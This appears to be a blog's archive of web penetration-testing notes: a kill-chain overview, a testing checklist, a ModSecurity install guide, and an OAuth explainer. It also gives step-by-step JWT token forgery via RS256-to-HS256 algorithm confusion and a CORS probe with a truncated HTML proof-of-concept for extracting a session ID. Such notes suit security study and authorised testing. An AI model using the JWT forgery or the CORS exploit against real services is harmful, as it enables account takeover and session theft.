Posts

Showing posts from March, 2020

kill chain

Stages of the kill chain:

Reconnaissance
Intrusion
Exploitation
Privilege Escalation
Lateral Movement
Obfuscation / Anti-forensics
Denial of Service
Exfiltration

Reconnaissance: The observation stage. Attackers typically assess the situation from the outside in, in order to identify both targets and tactics for the attack.

Intrusion: Based on what they discovered in the reconnaissance phase, attackers get into your systems, often by leveraging malware or security vulnerabilities.

Exploitation: The act of exploiting vulnerabilities and delivering malicious code onto the system in order to get a better foothold.

Privilege Escalation: Attackers often need more privileges on a system to get access to more data and permissions; for this they escalate their privileges, often to an administrator account.

Lateral Movement: Once they are in the system, attackers can move laterally to other systems and accounts in order to gain more leverage, whether that is higher permissio...

API PT

JWT attack: capture the RSA public key and create a new token (RS256 to HS256 algorithm confusion).

Attack method:
Step 1: Capture the JWT.
Step 2: In the header, change the algorithm from RS256 to HS256, and change the desired claim(s) in the payload.
Step 3: Base64url-encode the modified header and payload back into JWT format (header.payload).
Step 4: Add the signature: HMAC-SHA256 over header.payload, using the server's public key (the contents of key.pem) as the HMAC secret. A verifier that trusts the alg value in the header and passes the same public key to the HS256 code path will accept the forged token. The HMAC must be computed over the exact bytes of key.pem that the server uses (including the trailing newline), otherwise the signatures will not match.

How to get the server certificate:
    cmd: openssl s_client -connect <hostname>:443
Save the block between BEGIN CERTIFICATE and END CERTIFICATE from the output as cert.pem.

Getting the public key from the certificate:
    cmd: openssl x509 -pubkey -noout -in cert.pem > key.pem

Test handling of input

Fuzz all request parameters
Test for SQL injection
Identify all reflected data
Test for reflected XSS
Test for HTTP header injection
Test for arbitrary redirection
Test for stored attacks
Test for OS command injection
Test for path traversal
Test for script injection
Test for file inclusion
Test for SMTP injection
Test for native software flaws (buffer overflow, integer bugs, format strings)
Test for SOAP injection
Test for LDAP injection
Test for XPath injection

[v] HTTP parameter pollution
[v] Host header injection
[ ] XXE
[v] XSS
    1. Reflected
    2. Stored
    3. Blind
[ ] CSRF
    1. GET method
    2. POST method
    3. Token
[ ] SQLi
    1. In-band SQLi
    2. Inferential
    3. Out-of-band
[v] IDOR
[v] OS & command injection
[v] CRLF injection
[ ] XPath injection
[ ] SSRF
[ ] Session hijacking
[ ] Session fixation
[v] HTML injection
[ ] Open redirection
[ ] Parameter ...

Installing modsecurity and CRS in Local:

Step 1: Installing the Apache web server

First, install Apache if it is not already installed on your Ubuntu 18.04 server. Update the package index:
$ sudo apt-get update
Then install Apache (the package name is lowercase):
$ sudo apt-get install apache2
Press Y and hit Enter when prompted to confirm the installation. If Apache is already installed, apt reports instead:
apache2 is already the newest version

Step 2: Installing ModSecurity

Once Apache is installed, install the ModSecurity module:
$ sudo apt-get install libapache2-mod-security2
Restart Apache:
$ sudo service apache2 restart
Check that the module is enabled:
$ sudo apachectl -M | grep security
You should see:
security2_module (shared)

Step 3: Configuring ModSecurity

The ModSecurity engine needs rules to work. The rules decide how communication is...

Insecure CORS

CORS misconfiguration

Insecure CORS: url querystring = embed?

Ways to find an insecure CORS configuration:
1. Send Origin: www.evil.com in the request header and check the response header. If the response returns Access-Control-Allow-Origin: www.evil.com (the attacker-supplied origin is reflected), the CORS policy is insecure.
2. curl http://example.com -H "Origin: <attacking URL>" -I

Exploitable:
Access-Control-Allow-Origin: null
Access-Control-Allow-Credentials: true
(Browsers send Origin: null from sandboxed iframes, so an attacker page can obtain that origin and read the credentialed response.)

Poorly implemented but not exploitable:
Access-Control-Allow-Origin: *
(Browsers refuse to send credentials to a wildcard origin, so an attacker cannot read authenticated data.)

PAYLOAD:
<!DOCTYPE html>
<html>
<body>
<center>
<h2>CORS POC Exploit</h2>
<h3>Extract SID</h3>
<div id="demo">
<button type="button" onclick="cors()">Exploit</button>
</div>
<script>
function cors() {
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    if (this.readyState == 4 &&...
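The origin-probe check and the exploitability rules above, as an added example that is not code from the original post. The two "servers" are constructed stand-ins for a reflecting (insecure) and an allow-list (fixed) CORS policy, not real sites; the allow-listed origin https://app.example.com and the probe origin https://evil.example are made up. The classifier takes the response headers of a request that carried an attacker-controlled Origin and applies the rules from the post.

```javascript
// Added example (not from the original post): classify a probe response the way
// step 1 of the post does, plus the null / wildcard rules. Node.js, no dependencies.

// Constructed: a server that reflects whatever Origin it receives (insecure).
function reflectingServer(origin) {
  const headers = {};
  if (origin !== undefined) {
    headers['access-control-allow-origin'] = origin;
    headers['access-control-allow-credentials'] = 'true';
  }
  return headers;
}

// Constructed: a server that only echoes origins from a fixed allow-list (fixed).
// https://app.example.com is an assumed legitimate front-end origin.
const ALLOWED_ORIGINS = new Set(['https://app.example.com']);
function allowlistServer(origin) {
  if (!ALLOWED_ORIGINS.has(origin)) return {};
  return {
    'access-control-allow-origin': origin,
    'access-control-allow-credentials': 'true',
    vary: 'Origin',
  };
}

// Classify the response to a request whose Origin header was `probeOrigin`.
// probeOrigin must be an origin the attacker controls (or the literal "null"),
// otherwise a legitimately allow-listed origin would look like reflection.
// Header names are matched case-insensitively, as a browser would.
function assessCors(responseHeaders, probeOrigin) {
  const h = {};
  for (const [k, v] of Object.entries(responseHeaders)) h[k.toLowerCase()] = String(v).trim();
  const acao = h['access-control-allow-origin'];
  const creds = (h['access-control-allow-credentials'] || '').toLowerCase() === 'true';

  if (acao === undefined) {
    return { exploitable: false, reason: 'no ACAO header: cross-origin reads blocked' };
  }
  if (acao === '*') {
    // Browsers reject credentialed responses carrying a wildcard origin.
    return {
      exploitable: false,
      reason: creds ? 'ACAO * with credentials: browser rejects the combination'
                    : 'ACAO *: only unauthenticated data readable',
    };
  }
  if (acao === 'null' && creds) {
    return { exploitable: true, reason: 'ACAO null with credentials: reachable from a sandboxed iframe' };
  }
  if (acao === probeOrigin && creds) {
    return { exploitable: true, reason: 'attacker origin reflected with credentials' };
  }
  if (acao === probeOrigin) {
    return { exploitable: false, reason: 'origin reflected without credentials: only unauthenticated data readable' };
  }
  return { exploitable: false, reason: 'ACAO pinned to ' + acao };
}

// Run the probe from step 1 of the post against a server with a chosen Origin.
function probe(server, origin) {
  return assessCors(server(origin), origin);
}
```

Against a live target, replace the constructed server functions with the headers returned by the curl command in the post; the classification logic stays the same.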

OAuth

What is OAuth? OAuth 2.0 is a protocol that allows a user to grant limited access to their resources on one site to another site, without having to expose their credentials. Example: Many luxury cars today come with a valet key. It is a special key you give the parking attendant; unlike your regular key, it will not allow the car to be driven more than a mile or two. Some valet keys will not open the trunk, while others will block access to your onboard cell phone address book. Regardless of what restrictions the valet key imposes, the idea is very clever: you give someone limited access to your car with a special key, while using your regular key to unlock everything. To get access to the protected resources, OAuth 2.0 uses Access Tokens. An Access Token is a string representing the granted permissions. Access Token Format: Auth0 generates Access Tokens, for API Authorization scenarios, in JSON Web Token (JWT) format. JWTs contain three parts: a header, a payload, an...